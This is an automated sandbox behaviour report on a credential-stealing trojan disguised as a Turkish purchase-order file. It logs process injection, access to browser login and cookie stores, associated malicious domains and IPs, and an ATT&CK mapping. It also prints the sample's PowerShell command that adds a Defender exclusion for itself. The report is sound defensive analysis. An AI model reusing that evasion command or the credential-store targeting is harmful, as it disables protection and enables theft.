            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtQueryInformationToken: Direct from: 0x77542CAC
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtTerminateThread: Direct from: 0x77542FCC
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtDeviceIoControlFile: Direct from: 0x77542AEC
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtAllocateVirtualMemory: Direct from: 0x77542BEC
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtQueryVolumeInformationFile: Direct from: 0x77542F2C
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtOpenSection: Direct from: 0x77542E0C
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtAllocateVirtualMemory: Direct from: 0x775448EC
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtSetInformationThread: Direct from: 0x775363F9
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtQuerySystemInformation: Direct from: 0x775448CC
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtClose: Direct from: 0x77542B6C
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtReadVirtualMemory: Direct from: 0x77542E8C
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtCreateKey: Direct from: 0x77542C6C
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtSetInformationThread: Direct from: 0x77542B4C
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtQueryAttributesFile: Direct from: 0x77542E6C
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtAllocateVirtualMemory: Direct from: 0x77543C9C
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtCreateUserProcess: Direct from: 0x7754371C
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtQueryInformationProcess: Direct from: 0x77542C26
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtResumeThread: Direct from: 0x77542FBC
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtWriteVirtualMemory: Direct from: 0x7754490C
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtDelayExecution: Direct from: 0x77542DDC
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtAllocateVirtualMemory: Direct from: 0x77542BFC
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtReadFile: Direct from: 0x77542ADC
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtQuerySystemInformation: Direct from: 0x77542DFC
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtResumeThread: Direct from: 0x775436AC
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtNotifyChangeKey: Direct from: 0x77543C2C
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtCreateMutant: Direct from: 0x775435CC
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtWriteVirtualMemory: Direct from: 0x77542E3CJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtMapViewOfSection: Direct from: 0x77542D1CJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Memory written: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: NULL target: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: NULL target: C:\Windows\SysWOW64\unregmp2.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: NULL target: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe protection: read write
            Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: NULL target: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\unregmp2.exe Thread register set: target process: 7852
            Source: C:\Windows\SysWOW64\unregmp2.exe Thread APC queued: target process: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process created: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process created: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process created: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe Process created: C:\Windows\SysWOW64\unregmp2.exe "C:\Windows\SysWOW64\unregmp2.exe"
            Source: C:\Windows\SysWOW64\unregmp2.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: owYCvHvzfwuh.exe, 00000008.00000002.3778768329.0000000001461000.00000002.00000001.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 00000008.00000000.1466864725.0000000001461000.00000002.00000001.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000000.1609697544.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
            Source: owYCvHvzfwuh.exe, 00000008.00000002.3778768329.0000000001461000.00000002.00000001.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 00000008.00000000.1466864725.0000000001461000.00000002.00000001.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000000.1609697544.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: owYCvHvzfwuh.exe, 00000008.00000002.3778768329.0000000001461000.00000002.00000001.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 00000008.00000000.1466864725.0000000001461000.00000002.00000001.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000000.1609697544.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: owYCvHvzfwuh.exe, 00000008.00000002.3778768329.0000000001461000.00000002.00000001.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 00000008.00000000.1466864725.0000000001461000.00000002.00000001.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000000.1609697544.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Queries volume information: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe VolumeInformation
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match File source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0000000D.00000002.3781878826.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000002.1542475565.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000009.00000002.3779603566.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000009.00000002.3779712875.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.3779117946.0000000003600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000002.1543709314.00000000027F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\unregmp2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\unregmp2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\unregmp2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\unregmp2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\unregmp2.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\unregmp2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\unregmp2.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\unregmp2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\unregmp2.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match File source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0000000D.00000002.3781878826.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000002.1542475565.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000009.00000002.3779603566.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000009.00000002.3779712875.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.3779117946.0000000003600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000002.1543709314.00000000027F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
            Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
            Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
            Privilege Escalation: 412 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
            Defense Evasion: 1 Masquerading; 11 Disable or Modify Tools; 41 Virtualization/Sandbox Evasion; 412 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 4 Obfuscated Files or Information; 2 Software Packing; 1 DLL Side-Loading
            Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
            Discovery: 121 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 113 System Information Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
            Collection: 1 Email Collection; 1 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
            Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
            [Behavior graph: ID 1466660, Sample: Fiyat ARH-4309745275.pdf240..., Startdate: 03/07/2024, Architecture: WINDOWS, Score: 100]

            Source | Detection | Scanner | Label | Link
            Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | 61% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
            Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | 61% | Virustotal | | Browse
            Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
                Name | Malicious | Antivirus Detection | Reputation
                Name | Source | Malicious | Antivirus Detection | Reputation
                IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                Joe Sandbox version: 40.0.0 Tourmaline
                Analysis ID: 1466660
                Start date and time: 2024-07-03 08:51:59 +02:00
                Joe Sandbox product: CloudBasic
                Overall analysis duration: 0h 10m 39s
                Hypervisor based Inspection enabled: false
                Report type: full
                Cookbook file name: default.jbs
                Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed: 17
                Number of new started drivers analysed: 0
                Number of existing processes analysed: 0
                Number of existing drivers analysed: 0
                Number of injected processes analysed: 2
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode: default
                Analysis stop reason: Timeout
                Sample name: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
                Detection: MAL
                Classification: mal100.troj.spyw.evad.winEXE@14/5@16/10
                EGA Information:
                • Successful, ratio: 75%
                HCA Information:
                • Successful, ratio: 90%
                • Number of executed functions: 95
                • Number of non-executed functions: 288
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report creation exceeded maximum time and may have missing disassembly code information.
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                Time | Type | Description
                02:52:49 | API Interceptor | 1x Sleep call for process: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe modified
                02:53:47 | API Interceptor | 11002729x Sleep call for process: unregmp2.exe modified
                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                www.thesprinklesontop.comSiparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exeGet hashmaliciousFormBookBrowse
                • 208.91.197.27
                Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                • 208.91.197.27
                Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                • 208.91.197.27
                KALIANDRA SETYATAMA PO 1310098007.exeGet hashmaliciousFormBookBrowse
                • 208.91.197.27
                KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exeGet hashmaliciousFormBookBrowse
                • 208.91.197.27
                KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exeGet hashmaliciousFormBookBrowse
                • 208.91.197.27
                KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exeGet hashmaliciousFormBookBrowse
                • 208.91.197.27
                parkingpage.namecheap.comSiparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exeGet hashmaliciousFormBookBrowse
                • 91.195.240.19
                Att00173994.exeGet hashmaliciousFormBookBrowse
                • 91.195.240.19
                disjR92Xrrnc3aZ.exeGet hashmaliciousFormBookBrowse
                • 91.195.240.19
                Attendance list.exeGet hashmaliciousFormBookBrowse
                • 91.195.240.19
                Att0027592.exeGet hashmaliciousFormBookBrowse
                • 91.195.240.19
                #U0130#U015eLEM #U00d6ZET#U0130_524057699-1034 nolu TICAR_pdf (2).exeGet hashmaliciousFormBookBrowse
                • 91.195.240.19
                1R50C5E13BU8I.exeGet hashmaliciousFormBookBrowse
                • 91.195.240.19
                Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                • 91.195.240.19
                Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                • 91.195.240.19
                KALIANDRA SETYATAMA PO 1310098007.exeGet hashmaliciousFormBookBrowse
                • 91.195.240.19
                www.ennerdaledevcons.co.ukSiparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exeGet hashmaliciousFormBookBrowse
                • 212.227.172.254
                Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                • 212.227.172.254
                KALIANDRA SETYATAMA PO 1310098007.exeGet hashmaliciousFormBookBrowse
                • 212.227.172.254
                KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exeGet hashmaliciousFormBookBrowse
                • 212.227.172.254
                KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exeGet hashmaliciousFormBookBrowse
                • 212.227.172.254
                KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exeGet hashmaliciousFormBookBrowse
                • 212.227.172.254
                www.highwavesmarine.comSiparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exeGet hashmaliciousFormBookBrowse
                • 23.111.180.146
                Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                • 23.111.180.146
                Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                • 23.111.180.146
                KALIANDRA SETYATAMA PO 1310098007.exeGet hashmaliciousFormBookBrowse
                • 23.111.180.146
                KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exeGet hashmaliciousFormBookBrowse
                • 23.111.180.146
                KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exeGet hashmaliciousFormBookBrowse
                • 23.111.180.146
                KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exeGet hashmaliciousFormBookBrowse
                • 23.111.180.146
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                HVC-ASUSSiparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exeGet hashmaliciousFormBookBrowse
                • 23.111.180.146
                https://www.dgccollectors.com/doc.phpGet hashmaliciousUnknownBrowse
                • 199.167.144.130
                Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                • 23.111.180.146
                Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                • 23.111.180.146
                2024 Benefits_Revised_Agreement_83190_mgarrison_Signature_Required.pdfGet hashmaliciousUnknownBrowse
                • 162.252.172.232
                KALIANDRA SETYATAMA PO 1310098007.exeGet hashmaliciousFormBookBrowse
                • 23.111.180.146
                PXJpJX4mUp.exeGet hashmaliciousUnknownBrowse
                • 162.252.172.67
                KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exeGet hashmaliciousFormBookBrowse
                • 23.111.180.146
                KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exeGet hashmaliciousFormBookBrowse
                • 23.111.180.146
                KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exeGet hashmaliciousFormBookBrowse
                • 23.111.180.146
                DHOSTING-ASWarsawPolandPLSiparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exeGet hashmaliciousFormBookBrowse
                • 109.95.158.122
                nJ8mJTmMf0.exeGet hashmaliciousFormBookBrowse
                • 109.95.158.127
                DHL Arrival Notice.exeGet hashmaliciousFormBookBrowse
                • 109.95.158.127
                Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                • 109.95.158.122
                Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                • 109.95.158.122
                KALIANDRA SETYATAMA PO 1310098007.exeGet hashmaliciousFormBookBrowse
                • 109.95.158.122
                D02984-KP-002011.exeGet hashmaliciousFormBookBrowse
                • 109.95.158.127
                Shipping Documents.pdf.exeGet hashmaliciousFormBookBrowse
                • 109.95.158.127
                Salary Raise.exeGet hashmaliciousFormBookBrowse
                • 109.95.158.127
                REQN#1010135038.exeGet hashmaliciousFormBookBrowse
                • 109.95.158.127
                CLOUDFLARENETUSSHUYOU #U65b0#U6307#U4ee4 PO-2301010 03-07-2024.pdf.exeGet hashmaliciousFormBookBrowse
                • 104.21.34.95
